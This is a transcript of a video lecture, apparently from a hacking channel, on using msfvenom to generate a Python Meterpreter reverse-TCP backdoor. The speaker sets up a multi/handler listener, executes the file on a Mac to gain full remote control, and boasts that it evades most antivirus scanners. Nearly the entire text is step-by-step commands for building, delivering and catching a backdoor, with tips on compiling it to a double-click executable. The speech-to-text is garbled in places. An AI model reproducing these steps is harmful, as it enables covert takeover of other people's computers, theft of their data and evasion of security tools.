Hey, welcome. This is me, Ahmad Khan. I am cybersecurity researcher and a student. And in this lecture, I'm going to show you how we can generate Python encoded backdoor by using MSF Venom and how we can take fully control on any operating system. This backdoor will be for Linux, means if you wanted to penetrate Linux operating system you can do, and if you wanted to penetrate Mac OS X operating system like Catalina operating system, depending on the operating system you can do, and if you want Windows operating system you can penetrate. So this is not only for like Windows, or this is not only for Mac OS X Kali, this is for all, this is all in one backdoor. We will generate encrypted backdoor by using MSF Venom, and the backdoor will be Python backdoor. So how we can do this, how we can generate Python backdoor by using MSF Venom? Let's get started. So before starting the lecture, please share my channel with your friends if they have interest in ethical hacking and in cyber security, and as well as subscribe for upcoming content updates. So let's start it. So in this lecture I am going to use Linux operating system. You can use Parrot operating system, you can use another operating system depending on your choice, but I will recommend you use Linux. So I will open a terminal and minimize this, and this backdoor will be approximately, it can bypass almost not all antiviruses, but with some extent. So I will type first of all sudo to get to root ss, and I will clear it. So I will type MSF Venom. Let me show the payload list, MSF Venom hyphen help, and as you can see the option for MSF Venom. And you can see here, if I wanted to generate a backdoor, I can use like this command MSF Venom -p windows /meter press TCP depending on you, and blah blah blah. And the most interesting option for us is payload, because we wanted to see the payload options, how much payloads available for us by using MSF Venom, how we can generate, how much payload like we can generate. So for this, let me check the payload. For this I will type list hyphen list and payload, because I wanted to see payload list. So if I will hit enter, I'm waiting, it will load payload for me. And as you can see here, I'm waiting for the payload list to check how much payload available for us, how much payload are important for us. And you can see, wow, Metasploit has bunch of payload, you can see here. So multi-meter reverse TCP, NetWare, Node.js. So we are not interested in such type of payloads. We are interested in OS X payload. This is helpful for us. But in OS X payload, we are not interested in this like only execute reverse TCP. And you can see here OS X, we are not interested in such type of payloads. So we are interested in OS X x64 meter preturn. This is good for us. And as you can see here, this is also interesting for us. So we are not going to talk about these payloads. We are going to talk about Python payload, which will help us to exploit any type of operating system, almost as I said before. So in the coming lecture, maybe I will talk about OS X payload, but right now I'm going to penetrate OS X operating system by using Python backdoor. So Windows is not interesting for us. The most interesting for us in this topic is Python. We are interested in Python. And in Python, we are interested in meter preter, because we will use MSF console in order to get meter preter session. So we are interested in reverse HTTPS. We are interested in TCP depending on our choice. So I will use Python meter preter reverse TCP. You can use reverse HTTP, you can use reverse HTTPS, but I will use, maybe a reverse HTTPS is also interesting for me. So for this, as you can see here, the available payload for us by using MSF Venom, we can generate such type of payload. As you can see here, it's a lot of payloads. So right now what I'm going to do is I will clear the screen and I will type MSF Venom -p Python /meter preter /reverse _TCP. and I will set the host. In order to find my host, as you know, I will type sudo su root. If I will type ifconfig, and you can see here this is my IP address. I'm going to use a local network attack, and if you want out of network, you have to forward your port. So reverse TCP lhost, my host will be 192.168.61132, and then port will be like 4444. You can port like head 0 depending on your choice, as I said before. So right now what I'm going to do is, as you can see here, this is the L host, this is the L port. Right now I will choose output file, location, and the name. My output file name will be like, I want to save my Backdoor and www.html, and it will be like I will save like program.py, and here also I will open MSF console in order to get reverse connection. MSF console. So as you can see, her program is successfully generated. So if I will visit the location cd var www/html, HTML. So if I type ls, and as you can see here, this is my Backdoor program.py. So right now, as you can see here, MSF venom is successfully open. Right now I will type some command here in order to get reverse shell before executing it. Oh, sorry. Yes. So I will type use. I will use a module which will help us to get a reverse shell. Use exploit /multi/handle. It's good. So I will type set payload python /meter preter /reverse _ TCP, and I will set the host, which is my IP address 18.61.320, and I will put the port, which is basically 4444. And if I will check my options, and as you can see here, it's done. So right now I will run, and as you can see here, it's waiting for incoming connection. So what I'm going to do is, okay, what reverse session, it's got one reverse. So basically I executed tracing one Backdoor. So I will kill the session. So if I'll type sessions, sessions 1-i1 kill. I can type exec to close the session. So if I type sessions, and you can see here there is no active session. So what I'm going to do is, I'm going to copy the Backdoor. So for this I will type www/html. I will hit enter. Okay, enter. What's happened? www.html. Yes. And as you can see here, so I will copy this by pressing Ctrl C. So I will paste here in my Mac operating system, and as you can see here, this is my Mac operating system. So if I will click on Mac, you can see here I'm using Catalina operating system. So right now, as you can see here, my Backdoor is .py. It means that it required terminal execution. Means I have to execute this by using a terminal. Means if I wanted to Backdoor like by double click, like this is, let's suppose a Backdoor. If I will double click here by clicking a Backdoor, I have to get a reverse shell. Like how I can make such type Backdoors by doing this, by making your Backdoor, you have to compile your Python program. Like as you can see here, this is .py. I have to compile this to an executable. How you can compile it? It's too much easy. You can use any Python library. You can use PyInstaller. You can use I think I forgot the name. The library which will help you to make it an executable. So right now in this lecture, I'm not going to show you how we can compile this, but just directly I will execute through terminal. So I will type terminal cd desktop, cd YouTube. So I will execute program.py. So as you can see here, the program is successfully executed. Right now it will stop the terminal execution. And what happened if I will back to my attacking machine and see what happened, what I got. So if I will run it, and as you can see, it's done. Session 2 is open. So if I will type sessions, and you can see here running command. I think this is we can use with this. We cannot use this hand interpreter, and we got one session. So if I will type sysinfo, and you can see here this is about the Mac. Let me clear this. CLS. Sorry. Exploit -J. Sessions, no active sessions. So if I run, let me run it again, and as you can see, it's done. And you can see I got another session. So you can see here I got another session. If I will type sessions, so I will type sessions if an i3, and as you can see, so if I type sysinfo, and you can see I'm using Apple MacBook Pro. This is the architecture, and this is, you can see here, interpreter OS X. So if I type help, right now I can execute any type of command. I can upgrade the shell, I can download anything from the system, I can upload anything on the system, and I can execute, I can copy, I can delete, I can do anything. And you can see here I can even kill any process which basically running on the background of my attacking target machine. So as you can see, so right now if I will check the result of this file, how much antivirus detect this file. So what I'm going to do is I'm using clean scanner. So I'm going to use my Backdoor. I will click on scan and see what happened, how much antivirus detect this file. And as you can see here, it's scanning my file. And as you can see, this is pretty good result. Out of 40 antivirus, only 3 antivirus detect this file, and this file is detectable at CRAM AV. This is not important, too much antivirus. And the second one is this one, Immunite. The third one is Microsoft Defender. Yeah, this one is a little bit, this is important. But how you can bypass Defender, how we can defeat Defender, you can watch my previous lectures. So as you can see here, almost all strongest antivirus successfully bypassed. And you can see here Note 32, this is one of the strongest antivirus, this is bypass. And you can see here the other antivirus which is bypass Kaspersky as well, Komodo, Avera, AVG, Pet Defender, Headwear. You can see here these are the strongest antivirus which is bypassed by this Backdoor. So in this lecture we've seen how we can generate undetectable malware and how we can bypass macOS X security, how we can take full control on Mac operating system. Thank you.